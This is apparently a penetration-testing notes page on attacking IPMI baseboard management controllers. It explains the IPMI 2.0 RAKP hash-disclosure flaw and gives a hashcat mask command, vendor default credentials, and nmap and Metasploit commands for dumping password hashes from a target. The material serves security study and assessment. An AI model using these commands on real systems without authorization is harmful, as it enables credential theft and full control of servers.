DiscordHackTheBoxTryHackMeGitHub

IPMI

Intelligent Platform Management Interface (IPMI) is a set of standardized specifications for hardware-based host management systems used for system management and monitoring. It acts as an autonomous subsystem and works independently of the host's BIOS, CPU, firmware, and underlying operating system. IPMI provides sysadmins with the ability to manage and monitor systems even if they are powered off or in an unresponsive state. It operates using a direct network connection to the system's hardware and does not require access to the operating system via a login shell. IPMI communicates over port 623 UDP. Systems that use the IPMI protocol are called Baseboard Management Controllers (BMCs). If we can access a BMC during an assessment, we would gain full access to the host motherboard and be able to monitor, reboot, power off, or even reinstall the host operating system. Gaining access to a BMC is nearly equivalent to physical access to a system.

IPMI us typically used in three ways:

  • Before the OS has booted to modify BIOS settings

  • When the host is fully powered down

  • Access to a host after a system failure

When not being used for these tasks, IPMI can monitor a range of different things such as system temperature, voltage, fan status, and power supplies. To function, IPMI requires the following components:

  1. Baseboard Management Controller (BMC) - A micro-controller and essential component of an IPMI

  2. Intelligent Chassis Management Bus (ICMB) - An interface that permits communication from one chassis to another

  3. Intelligent Platform Management Bus (IPMB) - extends the BMC

  4. IPMI Memory - stores things such as the system event log, repository store data, and more

  5. Communications Interfaces - local system interfaces, serial and LAN interfaces, ICMB and PCI Management Bus

IPMI 2.0 RAKP flaw

During the authentication process, the server sends a salted SHA1 or MD5 hash of the user's password to the client before authentication takes place. This can be leveraged to obtain the password hash for ANY valid user account on the BMC. These password hashes can then be cracked offline using a dictionary attack using Hashcat mode 7300. In the event of an HP iLO using a factory default password, we can use this Hashcat mask attack command hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u which tries all combinations of upper case letters and numbers for an eight-character password.

Default Credentials

Product
Username
Password

Dell iDRAC

root

calvin

HP iLO

Administrator

randomized 8-character string consisting of numbers and uppercase letters

Supermicro IPMI

ADMIN

ADMIN

Tips2Hack

  1. Nmap

sudo nmap -sU --script ipmi-version -p 623 ilo.kekmaster.local

  1. Metasploit Version Scan

msf6 > use  auxiliary/scanner/ipmi/ipmi_version
msf6 > set rhosts 13.13.13.13
msf6 > run

  1. Metasploit Dumping Hashes

msf6 > use auxiliary/scanner/ipmi/ipmi_dumphashes 
msf6 > set rhosts 13.13.13.13
msf6 > run
PreviousSNMPNextR-Services

Last updated